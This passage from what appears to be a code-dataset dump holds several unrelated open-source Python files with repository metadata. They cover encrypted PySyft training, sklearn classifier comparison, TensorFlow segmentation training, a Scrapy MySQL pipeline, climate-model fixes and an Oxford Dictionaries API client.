loss.item(), time.time() - start_time))
def test(args, model, private_test_loader):
    """Evaluate the shared model on the encrypted test set and print accuracy."""
    model.eval()
    test_loss = 0  # NOTE(review): never updated below; dead variable.
    correct = 0
    with torch.no_grad():
        for data, target in private_test_loader:
            start_time = time.time()  # NOTE(review): unused in this function.
            output = model(data)
            pred = output.argmax(dim=1)
            # Comparison happens on shares; `correct` stays encrypted here.
            correct += pred.eq(target.view_as(pred)).sum()
    # Decrypt the final count once, after the whole loop.
    correct = correct.get().float_precision()
    print('\nTest set: Accuracy: {}/{} ({:.0f}%)\n'.format(
        correct.item(), len(private_test_loader) * args.test_batch_size,
        100. * correct.item() / (len(
            private_test_loader) * args.test_batch_size)))
model = Net()
# Convert weights to fixed precision and secret-share them across the
# workers, so training itself runs under SMPC.
model = model.fix_precision().share(*workers, crypto_provider=crypto_provider, requires_grad=True)
optimizer = optim.SGD(model.parameters(), lr=args.lr)
# The optimizer must operate in the same fixed-precision domain as the model.
optimizer = optimizer.fix_precision()
for epoch in range(1, args.epochs + 1):
    train(args, model, private_train_loader, optimizer, epoch)
    test(args, model, private_test_loader)
| [
"syyun@snu.ac.kr"
] | syyun@snu.ac.kr |
963899297ea299d27a48d4ec9b9e92f8ecd95e6d | ba3fddb7588dd0a86f7f59ebfacebe78a50a6815 | /classification.py | f86bffbbc89c5c1f0a1b4aa375ee860debecc799 | [] | no_license | tobi258/CSCI-576-Final-Project-1 | a94c5ec72f582de5d7f946cbf95c9b046d37e2d2 | 5b80010d2b90157430030205aa640a355976a847 | refs/heads/master | 2023-01-25T02:11:36.857069 | 2020-12-05T00:52:09 | 2020-12-05T00:52:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,286 | py | import pandas as pd
from pandas import DataFrame as DF
import json
import os
from typing import List
from sklearn.model_selection import GridSearchCV
from sklearn.tree import DecisionTreeClassifier
from sklearn.naive_bayes import GaussianNB, MultinomialNB
from sklearn.ensemble import AdaBoostClassifier
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
from xgboost import XGBClassifier
def list_files(test_train: str) -> List[str]:
    """Return the names of all ``.json`` feature files under root_path/test_train."""
    folder = os.path.join(root_path, test_train)
    return [entry for entry in os.listdir(folder) if entry.endswith('.json')]
def read_json(data_paths: list, test_train: str) -> dict:
    """Load each feature JSON file and map its feature_name to its values."""
    features = {}
    for name in data_paths:
        full_path = os.path.join(root_path, test_train, name)
        with open(full_path, 'r') as handle:
            parsed = json.load(handle)
            features[parsed["feature_name"]] = parsed["values"]
    return features
def join_dfs(features: dict):
    """Combine the nested per-feature dicts into one MultiIndex DataFrame.

    Index levels: (category, sample id); one column per feature, sorted by
    column name.
    """
    per_feature = []
    for feature_name, categories in features.items():
        frames = {
            category: DF.from_dict(values, orient='index', columns=[feature_name])
            for category, values in categories.items()
        }
        per_feature.append(pd.concat(frames))
    joined = per_feature[0].join(per_feature[1:])
    joined.sort_index(axis=1, inplace=True)
    return joined
def fit_predict(clf) -> list:
    """Train *clf* on the module-level train split, return test predictions."""
    clf.fit(X_train, y_train)
    predictions = clf.predict(X_test)
    return predictions
def grid_search_cv(model, param_grid, cv=4):
    """Exhaustive accuracy-scored grid search; returns the best parameter set."""
    searcher = GridSearchCV(
        model(),
        param_grid=param_grid,
        scoring='accuracy',
        cv=cv,
        n_jobs=-1,
    )
    searcher.fit(X_train, y_train)
    return searcher.best_params_
def format_output(input_list) -> List[str]:
    """Left-justify every item into a fixed 9-character column."""
    columns = []
    for item in input_list:
        columns.append('{:<9}'.format(item))
    return columns
def compare(l1) -> int:
    """Count positions where *l1* agrees with the module-level y_test labels."""
    matches = 0
    for predicted, actual in zip(l1, y_test):
        if predicted == actual:
            matches += 1
    return matches
# list all json files of all features
root_path = "Data"
test_path, train_path = "test_data", "train_data"
test_feat_paths = list_files(test_path)
train_feat_paths = list_files(train_path)
# read all json files into dictionaries
test_feat = read_json(test_feat_paths, test_path)
train_feat = read_json(train_feat_paths, train_path)
# join dataframes into single dataframe
tr_df = join_dfs(train_feat)
te_df = join_dfs(test_feat)
tr_idx1 = tr_df.index.get_level_values(0)
te_idx1 = te_df.index.get_level_values(0)
# train-test data
X_train, X_test, y_train, y_test = tr_df, te_df, tr_idx1, te_idx1
xgb_params = {'n_estimators': (2, 5, 10, 20, 30, 50),
'learning_rate': (.01, .05, .1, .2, .3)}
xgb_params_best = grid_search_cv(XGBClassifier, xgb_params)
xgb_res = fit_predict(XGBClassifier())
gnb_res = fit_predict(GaussianNB())
mnb_res = fit_predict(MultinomialNB())
adb_res = fit_predict(AdaBoostClassifier())
svm_res = fit_predict(SVC())
knn_res = fit_predict(KNeighborsClassifier())
dct_res = fit_predict(DecisionTreeClassifier())
print(f'XGBoost: {format_output(xgb_res)} - {compare(xgb_res)}')
print(f'GaussianNB: {format_output(gnb_res)} - {compare(gnb_res)}')
print(f'MultinomialNB: {format_output(mnb_res)} - {compare(mnb_res)}')
print(f'AdaBoost: {format_output(adb_res)} - {compare(adb_res)}')
print(f'SVM: {format_output(svm_res)} - {compare(svm_res)}')
print(f'KNN: {format_output(knn_res)} - {compare(knn_res)}')
print(f'Decision tree: {format_output(dct_res)} - {compare(dct_res)}')
print(f'Y-test: {format_output(y_test)}')
| [
"yingxuan.guo9771@gmail.com"
] | yingxuan.guo9771@gmail.com |
7913c130e1f4209bcfa6624d9d38a314535ef7cf | 811746ebface45597cf3182af7af3c53021f7348 | /hw_0805.py | 220c8616ed609596fcb7f6ef190a09f92a0dab68 | [] | no_license | injoon5/C3coding-python | 94b217a72047f01d2ac9b366065c8386bc80cadc | 7a314854db88e3168066f7ecb087a607a5b87402 | refs/heads/master | 2022-12-22T20:28:25.728920 | 2020-10-07T11:12:31 | 2020-10-07T11:12:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 290 | py | files = [
'apple.jpg 20180101', 'Frozen.mp4 20140507',
'Rough.mp3 20160305', 'LoveWhisper.mp3 20170909',
'pizza.jpg 20120505', 'Avengers.mp4 20111225',
'Navillera.mp3 20161005', 'Incredibles2.mp4 20180905',
'lion.jpg 20180726', 'PacificRim.mp4 20131231'
]
| [
"noreply@github.com"
] | injoon5.noreply@github.com |
7e667d3486931ba59373c5e36d220ef4f6aa1832 | fa1730dd1cd97d3c16946d71c2cee46948aef7b6 | /libs/trainer.py | 5aaf9269fba995ef95453de06c3d6d9d05b9fb30 | [] | no_license | dmitrii-marin/fast-semantic-segmentation | 0e613e8296619ed769863b6e3212a5f00a0f9747 | 6bff8a4a5c938c1c8c651e4adfc2dcf75050d942 | refs/heads/master | 2020-04-01T15:14:37.242102 | 2018-10-13T17:54:14 | 2018-10-13T18:13:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,890 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import time
import tensorflow as tf
from third_party import model_deploy
from third_party import mem_util
from builders import model_builder
from builders import dataset_builder
from builders import preprocessor_builder
from builders import optimizer_builder
slim = tf.contrib.slim
prefetch_queue = slim.prefetch_queue
def create_training_input(create_input_fn,
                          preprocess_fn,
                          batch_size,
                          batch_queue_capacity,
                          batch_queue_threads,
                          prefetch_queue_capacity):
    """Build the batched, prefetched input pipeline for training.

    create_input_fn: returns a tensor dict containing the image/label fields.
    preprocess_fn: optional factory returning an augmentation callable.
    Returns a slim prefetch queue that yields (padded) training batches.
    """
    tensor_dict = create_input_fn()

    def cast_and_reshape(tensor_dict, dicy_key):
        # Cast the raw image tensor to float32 in place and return the dict.
        items = tensor_dict[dicy_key]
        float_images = tf.to_float(items)
        tensor_dict[dicy_key] = float_images
        return tensor_dict

    tensor_dict = cast_and_reshape(tensor_dict,
                                   dataset_builder._IMAGE_FIELD)

    if preprocess_fn is not None:
        # Apply the configured augmentation pipeline to the tensor dict.
        preprocessor = preprocess_fn()
        tensor_dict = preprocessor(tensor_dict)

    # dynamic_pad=True lets differently sized images share one batch.
    batched_tensors = tf.train.batch(tensor_dict,
        batch_size=batch_size, num_threads=batch_queue_threads,
        capacity=batch_queue_capacity, dynamic_pad=True)

    return prefetch_queue.prefetch_queue(batched_tensors,
        capacity=prefetch_queue_capacity,
        dynamic_pad=False)
def create_training_model_losses(input_queue, create_model_fn, train_config,
                                 train_dir=None, gradient_checkpoints=None):
    """Build one clone's forward pass and register its losses.

    Dequeues a batch from *input_queue*, runs the segmentation model,
    optionally tags graph nodes for gradient checkpointing, and adds every
    model loss to tf.GraphKeys.LOSSES so model_deploy can aggregate them.
    """
    _, segmentation_model = create_model_fn()

    # Optional quantization
    if train_config.quantize_with_delay:
        tf.logging.info('Adding quantization nodes to training graph...')
        tf.contrib.quantize.create_training_graph(
            quant_delay=train_config.quantize_with_delay)

    read_data_list = input_queue.dequeue()

    def extract_images_and_targets(read_data):
        # Pull the image and label tensors out of the dequeued dict.
        images = read_data[dataset_builder._IMAGE_FIELD]
        labels = read_data[dataset_builder._LABEL_FIELD]
        return (images, labels)

    (images, labels) = zip(*map(extract_images_and_targets, [read_data_list]))

    # Incase we need to do zero centering, we do it here
    preprocessed_images = []
    for image in images:
        resized_image = segmentation_model.preprocess(image)
        preprocessed_images.append(resized_image)
    images = tf.concat(preprocessed_images, 0, name="Inputs")

    segmentation_model.provide_groundtruth(labels[0])
    prediction_dict = segmentation_model.predict(images)

    # Add checkpointing nodes to correct collection
    if gradient_checkpoints is not None:
        tf.logging.info(
            'Adding gradient checkpoints to `checkpoints` collection')
        graph = tf.get_default_graph()
        checkpoint_list = gradient_checkpoints
        for checkpoint_node_name in checkpoint_list:
            curr_tensor_name = checkpoint_node_name + ":0"
            node = graph.get_tensor_by_name(curr_tensor_name)
            tf.add_to_collection('checkpoints', node)

    # Gather main and aux losses here to single collection
    losses_dict = segmentation_model.loss(prediction_dict)
    for loss_tensor in losses_dict.values():
        tf.losses.add_loss(loss_tensor)
def train_segmentation_model(create_model_fn,
                             create_input_fn,
                             train_config,
                             master,
                             task,
                             is_chief,
                             startup_delay_steps,
                             train_dir,
                             num_clones,
                             num_worker_replicas,
                             num_ps_tasks,
                             clone_on_cpu,
                             replica_id,
                             num_replicas,
                             max_checkpoints_to_keep,
                             save_interval_secs,
                             image_summaries,
                             log_memory=False,
                             gradient_checkpoints=None,
                             sync_bn_accross_gpu=False):
    """Build the training graph for a FastSegmentationModel and run training.

    Clones the model over `num_clones` devices, wires input queues, losses,
    optimizer, summaries and checkpointing, then enters slim.learning.train
    until `train_config.num_steps`. (`replica_id` / `num_replicas` are kept
    for interface compatibility.)
    """
    _, segmentation_model = create_model_fn()
    deploy_config = model_deploy.DeploymentConfig(
        num_clones=num_clones,
        clone_on_cpu=clone_on_cpu,
        replica_id=task,
        num_replicas=num_worker_replicas,
        num_ps_tasks=num_ps_tasks)
    startup_delay_steps = task * startup_delay_steps
    per_clone_batch_size = train_config.batch_size // num_clones

    preprocess_fn = None
    if train_config.preprocessor_step:
        preprocess_fn = functools.partial(
            preprocessor_builder.build,
            preprocessor_config_list=train_config.preprocessor_step)

    with tf.Graph().as_default():
        # CPU of common ps server
        with tf.device(deploy_config.variables_device()):
            global_step = tf.train.get_or_create_global_step()

        with tf.device(deploy_config.inputs_device()):  # CPU of each worker
            input_queue = create_training_input(
                create_input_fn,
                preprocess_fn,
                per_clone_batch_size,
                batch_queue_capacity=train_config.batch_queue_capacity,
                batch_queue_threads=train_config.num_batch_queue_threads,
                prefetch_queue_capacity=train_config.prefetch_queue_capacity)

        # Create the model clones on the device storing the variables.
        with tf.device(deploy_config.variables_device()):
            # Note: it is assumed that any loss created by `model_fn`
            # is collected at the tf.GraphKeys.LOSSES collection.
            model_fn = functools.partial(
                create_training_model_losses,
                create_model_fn=create_model_fn,
                train_config=train_config,
                train_dir=train_dir,
                gradient_checkpoints=gradient_checkpoints)
            clones = model_deploy.create_clones(deploy_config,
                                                model_fn, [input_queue])
            first_clone_scope = deploy_config.clone_scope(0)

        if sync_bn_accross_gpu:
            # Attempt to sync BN updates across all GPUs in a tower.
            # Caution since this is very slow. Might not be needed.
            update_ops = []
            for idx in range(num_clones):
                # FIX: was clone_scope(0), which collected the first clone's
                # update ops num_clones times instead of one scope per clone.
                nth_clone_sope = deploy_config.clone_scope(idx)
                update_ops.extend(tf.get_collection(
                    tf.GraphKeys.UPDATE_OPS, nth_clone_sope))
        else:
            # Gather updates from first GPU only
            update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS,
                                           first_clone_scope)

        # Init variable to collect summaries
        summaries = set(tf.get_collection(tf.GraphKeys.SUMMARIES))
        # Add summaries for losses.
        for loss in tf.get_collection(tf.GraphKeys.LOSSES, first_clone_scope):
            summaries.add(tf.summary.scalar('Losses/%s' % loss.op.name, loss))

        with tf.device(deploy_config.optimizer_device()):  # CPU of each worker
            (training_optimizer,
             optimizer_summary_vars) = optimizer_builder.build(
                train_config.optimizer)
            for var in optimizer_summary_vars:
                summaries.add(
                    tf.summary.scalar(var.op.name, var, family='LearningRate'))

        # Add summaries for model variables.
        for model_var in slim.get_model_variables():
            summaries.add(tf.summary.histogram(model_var.op.name, model_var))

        # Fine tune from classification or segmentation checkpoints
        trainable_vars = tf.get_collection(
            tf.GraphKeys.TRAINABLE_VARIABLES)
        # FIX: default init_fn so slim.learning.train below does not hit a
        # NameError when no fine-tune checkpoint is configured.
        init_fn = None
        if train_config.fine_tune_checkpoint:
            if not train_config.fine_tune_checkpoint_type:
                raise ValueError('Must specify `fine_tune_checkpoint_type`.')
            tf.logging.info('Initializing %s model from checkpoint %s',
                            train_config.fine_tune_checkpoint_type,
                            train_config.fine_tune_checkpoint)
            variables_to_restore = segmentation_model.restore_map(
                fine_tune_checkpoint_type=train_config.fine_tune_checkpoint_type)
            init_fn = slim.assign_from_checkpoint_fn(
                train_config.fine_tune_checkpoint,
                variables_to_restore,
                ignore_missing_vars=True)
            if train_config.freeze_fine_tune_backbone:
                # FIX: the log line had a %s placeholder with no argument.
                tf.logging.info(
                    'Freezing %s scope from checkpoint.',
                    segmentation_model.shared_feature_extractor_scope)
                non_frozen_vars = []
                for var in trainable_vars:
                    if not var.op.name.startswith(
                            segmentation_model.shared_feature_extractor_scope):
                        non_frozen_vars.append(var)
                        tf.logging.info('Training variable: %s', var.op.name)
                trainable_vars = non_frozen_vars
        else:
            tf.logging.info('Not initializing the model from a checkpoint. '
                            'Initializing from scratch!')

        # TODO(@oandrien): we might want to add gradient multiplier here
        # for the last layer if we have trouble with training
        # CPU of common ps server
        with tf.device(deploy_config.optimizer_device()):
            reg_losses = (None if train_config.add_regularization_loss
                          else [])
            total_loss, grads_and_vars = model_deploy.optimize_clones(
                clones, training_optimizer,
                regularization_losses=reg_losses,
                var_list=trainable_vars)
            total_loss = tf.check_numerics(total_loss,
                                           'LossTensor is inf or nan.')
            summaries.add(
                tf.summary.scalar('Losses/TotalLoss', total_loss))

            grad_updates = training_optimizer.apply_gradients(
                grads_and_vars, global_step=global_step)
            update_ops.append(grad_updates)
            update_op = tf.group(*update_ops, name='update_barrier')
            # train_op reports the loss but only after all updates have run.
            with tf.control_dependencies([update_op]):
                train_op = tf.identity(total_loss, name='train_op')

        # TODO: this ideally should not be hardcoded like this.
        # should have a way to access the prediction and GT tensor
        if image_summaries:
            graph = tf.get_default_graph()
            pixel_scaling = max(1, 255 // 19)
            summ_first_clone_scope = (first_clone_scope + '/'
                                      if first_clone_scope else '')
            main_labels = graph.get_tensor_by_name(
                '%sSegmentationLoss/Reshape:0' % summ_first_clone_scope)
            main_preds = graph.get_tensor_by_name(
                '%sSegmentationLoss/Reshape_1:0' % summ_first_clone_scope)
            main_preds = tf.cast(main_preds * pixel_scaling, tf.uint8)
            summaries.add(
                tf.summary.image('VerifyTrainImages/Predictions', main_preds))
            main_labels = tf.cast(main_labels * pixel_scaling, tf.uint8)
            summaries.add(
                tf.summary.image('VerifyTrainImages/Groundtruths', main_labels))

        # Add the summaries from the first clone. These contain the summaries
        # created by model_fn and either optimize_clones()
        # or _gather_clone_loss().
        summaries |= set(
            tf.get_collection(tf.GraphKeys.SUMMARIES, first_clone_scope))

        # Merge all summaries together.
        summary_op = tf.summary.merge(list(summaries))
        session_config = tf.ConfigProto(
            allow_soft_placement=True, log_device_placement=True)

        # Save checkpoints regularly.
        saver = tf.train.Saver(max_to_keep=max_checkpoints_to_keep)

        # HACK to see memory usage.
        # TODO: Clean up, pretty messy.
        def train_step_mem(sess, train_op, global_step, train_step_kwargs):
            # Custom slim train step that traces the run so peak GPU memory
            # can be reported alongside the loss.
            start_time = time.time()
            run_metadata = tf.RunMetadata()
            options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
            total_loss, np_global_step = sess.run(
                [train_op, global_step],
                options=options,
                run_metadata=run_metadata)
            time_elapsed = time.time() - start_time
            if 'should_log' in train_step_kwargs:
                if sess.run(train_step_kwargs['should_log']):
                    tf.logging.info(
                        'global step %d: loss = %.4f (%.3f sec/step)',
                        np_global_step, total_loss, time_elapsed)
                if log_memory:
                    mem_use = mem_util.peak_memory(run_metadata)['/gpu:0'] / 1e6
                    tf.logging.info('Memory used: %.2f MB', (mem_use))
            if 'should_stop' in train_step_kwargs:
                should_stop = sess.run(train_step_kwargs['should_stop'])
            else:
                should_stop = False
            return total_loss, should_stop

        # Main training loop
        slim.learning.train(
            train_op,
            train_step_fn=train_step_mem,
            logdir=train_dir,
            master=master,
            is_chief=is_chief,
            session_config=session_config,
            number_of_steps=train_config.num_steps,
            startup_delay_steps=startup_delay_steps,
            init_fn=init_fn,
            summary_op=summary_op,
            save_summaries_secs=120,
            save_interval_secs=save_interval_secs,
            saver=saver)
| [
"andrienko@live.ca"
] | andrienko@live.ca |
6f1ea8613628207e2684c6f0ca5e634b1b909f47 | 29f828a588cfec578bd75f735a9103f4da5696ff | /91_Python_Tornado_F2E/F2E.im-master/app/webCrawler_scrapy/pipelines.py | 772630485716eed943e25b6e2262ded9f41ca0c1 | [
"MIT",
"BSD-3-Clause"
] | permissive | lzpdzlzpdz/lzpdzlzpdzPython | 8f0dc50dffd057167830a9845959d2e29a675cc1 | 5718190700d9eba39caa11b0d4be7233d279449e | refs/heads/master | 2021-10-11T13:51:39.756353 | 2019-01-27T04:15:45 | 2019-01-27T04:15:45 | 109,458,743 | 0 | 1 | null | 2019-01-27T04:15:46 | 2017-11-04T01:53:50 | Python | UTF-8 | Python | false | false | 3,565 | py | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
from twisted.enterprise import adbapi
import MySQLdb
import MySQLdb.cursors
import codecs
import json
from logging import log
class JsonWithEncodingPipeline(object):
    '''Pipeline that appends every scraped item to ``info.json``,
    one JSON object per line.

    Usage:
      1. Register this class in ``ITEM_PIPELINES`` in settings.py.
      2. ``yield item`` from the spider; Scrapy then calls process_item.
    '''
    def __init__(self):
        # Open once; UTF-8 so non-ASCII (e.g. Chinese) text is stored readably.
        self.file = codecs.open('info.json', 'w', encoding='utf-8')

    def process_item(self, item, spider):
        # ensure_ascii=False keeps non-ASCII characters as-is instead of
        # \uXXXX escapes -- otherwise opening the file as UTF-8 is pointless.
        line = json.dumps(dict(item), ensure_ascii=False) + "\n"
        self.file.write(line)
        return item

    def spider_closed(self, spider):
        # Called when the spider finishes; release the file handle.
        self.file.close()
class WebcrawlerScrapyPipeline(object):
    '''Pipeline that stores scraped items in a MySQL database.
    1. Register this class in ITEM_PIPELINES in settings.py.
    2. ``yield item`` from the spider; Scrapy calls process_item automatically.'''
    def __init__(self,dbpool):
        self.dbpool=dbpool
        ''' The commented-out block below shows how to hard-code the
        connection-pool parameters instead of reading them from the settings
        file (as from_settings does), which is the more flexible approach:
        self.dbpool=adbapi.ConnectionPool('MySQLdb',
                                          host='127.0.0.1',
                                          db='crawlpicturesdb',
                                          user='root',
                                          passwd='123456',
                                          cursorclass=MySQLdb.cursors.DictCursor,
                                          charset='utf8',
                                          use_unicode=False)'''
    @classmethod
    def from_settings(cls,settings):
        '''1. @classmethod declares a class method, as opposed to the usual
           instance methods whose first argument is ``self``.
        2. The first argument ``cls`` (short for class) is the class itself.
        3. It can be called directly on the class, like C.f(), similar to a
           static method in Java.'''
        dbparams=dict(
            host=settings['MYSQL_HOST'],#read the connection config from settings
            db=settings['MYSQL_DBNAME'],
            user=settings['MYSQL_USER'],
            passwd=settings['MYSQL_PASSWD'],
            charset='utf8',#the charset must be set, otherwise Chinese text may come out garbled
            cursorclass=MySQLdb.cursors.DictCursor,
            use_unicode=False,
        )
        dbpool=adbapi.ConnectionPool('MySQLdb',**dbparams)#** expands the dict into keyword args, i.e. host=xxx, db=yyy, ...
        return cls(dbpool)#hands the pool to the class; it is then available as self.dbpool
    #called by Scrapy for every item by default
    def process_item(self, item, spider):
        query=self.dbpool.runInteraction(self._conditional_insert,item)#schedule the insert
        query.addErrback(self._handle_error,item,spider)#attach the error handler
        return item
    #write the item into the database
    def _conditional_insert(self,tx,item):
        #print item['name']
        sql="insert into testtable(name,url) values(%s,%s)"
        params=(item["name"],item["url"])
        tx.execute(sql,params)
    #error-handling callback
    def _handle_error(self, failue, item, spider):
        print '--------------database operation exception!!-----------------'
        print '-------------------------------------------------------------'
        print failue
"lzpdzlzpdz@sina.cn"
] | lzpdzlzpdz@sina.cn |
c26a20010545e8b411902603912afc4551a57f92 | d25896680f1b75c4d29f9ba35a6965a1aa03e3ad | /myenv/bin/autopep8 | c3626cb73943284f1c23df0f2b232f8685243de6 | [] | no_license | AydinSanoz/DjangoProject1 | 25eec38ce42cd128f36e753e3e9da689dcf6a61b | b8d2897fb4e03ee72ec523e8ccf01d3f3c9c05d4 | refs/heads/master | 2023-02-06T22:20:17.358303 | 2020-12-28T19:04:17 | 2020-12-28T19:04:17 | 325,047,532 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,010 | #!/Users/catalina/Desktop/repositories/django/myenv/bin/python3.9
# EASY-INSTALL-ENTRY-SCRIPT: 'autopep8==1.5.4','console_scripts','autopep8'
import re
import sys
# for compatibility with easy_install; see #2198
__requires__ = 'autopep8==1.5.4'
try:
from importlib.metadata import distribution
except ImportError:
try:
from importlib_metadata import distribution
except ImportError:
from pkg_resources import load_entry_point
def importlib_load_entry_point(spec, group, name):
dist_name, _, _ = spec.partition('==')
matches = (
entry_point
for entry_point in distribution(dist_name).entry_points
if entry_point.group == group and entry_point.name == name
)
return next(matches).load()
globals().setdefault('load_entry_point', importlib_load_entry_point)
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(load_entry_point('autopep8==1.5.4', 'console_scripts', 'autopep8')())
| [
"aydinsanoz2@gmail.com"
] | aydinsanoz2@gmail.com | |
06f1a43f6bc4ae7fd812d6ce5cd6fbb22658ad50 | 5ec788214449203feff42a68ac85d7eaa8428aa7 | /src/assertion_finder.py | e6ebc059c068361f4eda06dfe583e5b3fd7cb029 | [] | no_license | wangwillson1/polygraph | e89eba0afe95cbaa53f2d047ce37b7093f3d2716 | 545f47fca963bff0c3ab5a34490e3060133a4403 | refs/heads/master | 2023-02-15T18:09:22.540804 | 2021-01-17T13:18:56 | 2021-01-17T13:18:56 | 330,081,349 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,924 | py | import json
from src.definitions import ROOT_PATH, SETTINGS
import requests
from allennlp.data.tokenizers.sentence_splitter import SpacySentenceSplitter
class AssertionFinder:
    """Scores sentences with the ClaimBuster API and extracts check-worthy
    claims from timestamped video captions."""

    def __init__(self):
        self.base_url = "https://idir.uta.edu/claimbuster/api/v2/score/text/"
        # Static request headers; the API key comes from the project settings.
        self.headers = {
            'x-api-key': SETTINGS["assertion_finder"]["api_key"],
            'Accept': "*/*",
            'Cache-Control': "no-cache",
            'Host': "idir.uta.edu",
            'Accept-Encoding': "gzip, deflate",
            'Connection': "keep-alive",
            'cache-control': "no-cache"
        }

    def assertion_likelihood(self, sentence: str) -> float:
        """Return ClaimBuster's check-worthiness score for *sentence*, or 0
        when the API does not label it a check-worthy factual statement."""
        # The sentence is embedded in the URL path with only spaces escaped.
        # NOTE(review): other reserved characters are not escaped -- presumably
        # fine for caption text, but worth confirming.
        response = requests.request("GET", self.base_url + sentence.replace(" ", "%20"), headers=self.headers)
        res = json.loads(response.text)["results"][0]
        if res["result"] != "Check-worthy factual statement":
            return 0
        return res["score"]

    def parse_captions(self, captions: dict) -> dict:
        """Group caption fragments (timestamp -> text) into 3-fragment claims
        and score each; returns {timestamp: {"claim", "claim_score"}}."""
        # Commented-out alternative: split the full transcript into proper
        # sentences with Spacy instead of fixed 3-fragment windows.
        # full_text = " ".join(captions.values())
        # splitter = SpacySentenceSplitter()
        # sentences = splitter.split_sentences(full_text)
        # tmstmp_sentences = {k: {"claim": v} for k, v in zip(captions.keys(), sentences)}
        # for sentence in tmstmp_sentences.values():
        #     sentence["claim_score"] = self.assertion_likelihood(sentence["claim"])
        #
        # print(tmstmp_sentences)
        assertions = dict()
        # Sort fragments by their numeric timestamp key.
        c = sorted(list(captions.items()), key=lambda x: float(x[0]))
        for i in range(0, len(c), 3):
            if i + 2 >= len(c):
                # Fewer than three fragments left: the tail is dropped.
                break
            a = c[i][1] + " " + c[i + 1][1] + " " + c[i + 2][1]
            assertions[c[i][0]] = {"claim": a}
        for sentence in assertions.values():
            sentence["claim_score"] = self.assertion_likelihood(sentence["claim"])
        return assertions
        # return tmstmp_sentences
| [
"james.rosstwo@gmail.com"
] | james.rosstwo@gmail.com |
60738160b15b49779d9eaf9e8d83139fd7afa508 | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5636311922769920_0/Python/sleepingfire/d.py | ba96e3d60f9df7e644e9b38c0dc4523c1c6882bd | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 988 | py | import sys, os, math
def main(K, C, S):
minimum = math.ceil(K / C)
if minimum > S:
return "IMPOSSIBLE"
cs = [1] * (C + 1)
for i in range(1, C+1):
cs[i] = C * cs[i-1]
tiles = []
idx = 1
depth = 0
for k in range(1, math.ceil(K / C) * C + 1):
idx = (idx - 1) * K + min(k, K)
#print(k, depth, idx)
depth += 1
if depth == C:
tiles.append(idx)
idx = 1
depth = 0
return tiles
if __name__ == "__main__":
in_path = "test.in" if len(sys.argv) == 1 else sys.argv[1]
in_file = open(in_path, 'r')
T = int(in_file.readline().rstrip())
for case_idx in range(T):
K, C, S = [int(z) for z in in_file.readline().rstrip().split()]
res = main(K, C, S)
if isinstance(res, list):
print("Case #{}: {}".format(case_idx + 1, " ".join([str(z) for z in res])))
else:
print("Case #{}: {}".format(case_idx + 1, res))
| [
"alexandra1.back@gmail.com"
] | alexandra1.back@gmail.com |
5181964f5dabcf8422ed8caf47606b01b18e0794 | 2df685967eae6ca93636ea6edb5158c192a27427 | /esmvalcore/cmor/_fixes/cmip6/cesm2_waccm_fv2.py | bc8068af8abd32fb825028a187f30ff1298286cd | [
"Apache-2.0"
] | permissive | BSC-ES/ESMValCore | 4755b7c438624a3adbdaebfb8149b7a2bb022bf3 | 639e5abbf64498abdbe404d9b1ce813bf3f7e42e | refs/heads/main | 2023-08-24T22:44:52.874064 | 2021-10-18T09:27:47 | 2021-10-18T09:27:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 385 | py | """Fixes for CESM2-WACCM-FV2 model."""
from .cesm2 import Tas as BaseTas
from .cesm2 import Fgco2 as BaseFgco2
from .cesm2_waccm import Cl as BaseCl
from .cesm2_waccm import Cli as BaseCli
from .cesm2_waccm import Clw as BaseClw
from ..common import SiconcFixScalarCoord
Cl = BaseCl
Cli = BaseCli
Clw = BaseClw
Fgco2 = BaseFgco2
Siconc = SiconcFixScalarCoord
Tas = BaseTas
| [
"noreply@github.com"
] | BSC-ES.noreply@github.com |
34b46ce40d254e490f29734e91f39c6af8b67bd4 | b07d9b13b677daf5732dc0623b64f6514fc28b73 | /oxford_dict.py | fb1489442792fdf7349daab07d97197a4b1729a1 | [
"Unlicense"
] | permissive | abdnh/anki-oxford-dict | c7c46adac348e5342689ed5af2947d90e6605db9 | 7be9d76619f80ee187aeffd45c5eb7bea0535c1e | refs/heads/master | 2022-11-21T18:33:51.336549 | 2020-07-28T22:54:22 | 2020-07-28T22:54:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 769 | py | import requests
class ODError(Exception):
    """Base class for Oxford Dictionaries client errors."""
    pass
class ODConnectionError(ODError):
    """Raised when the HTTP request to the API cannot be completed."""
    pass
class ODWordNotFound(ODError):
    """Raised when the API returns 404 for the requested word."""
    pass
class OxfordDict:
    """Minimal client for the Oxford Dictionaries v2 ``entries`` endpoint."""

    def __init__(self, app_id, app_key):
        self.app_id = app_id
        self.app_key = app_key

    def get_word_data(self, word, lang='en-gb'):
        """Look up *word* in the given language and return the parsed JSON.

        Raises ODConnectionError when the request cannot be completed and
        ODWordNotFound when the API reports a 404 for the word.
        """
        from urllib.parse import quote
        # Percent-encode the word so entries containing spaces or other
        # reserved characters still form a valid URL.
        url = ('https://od-api.oxforddictionaries.com/api/v2/entries/'
               + lang + '/' + quote(word) + '?strictMatch=false')
        try:
            r = requests.get(url, headers={'app_id': self.app_id, 'app_key': self.app_key})
        except requests.exceptions.RequestException:
            raise ODConnectionError("connection failed")
        if r.status_code == 404:
            raise ODWordNotFound(f"'{word}' not found in the dictionary")
        return r.json()
| [
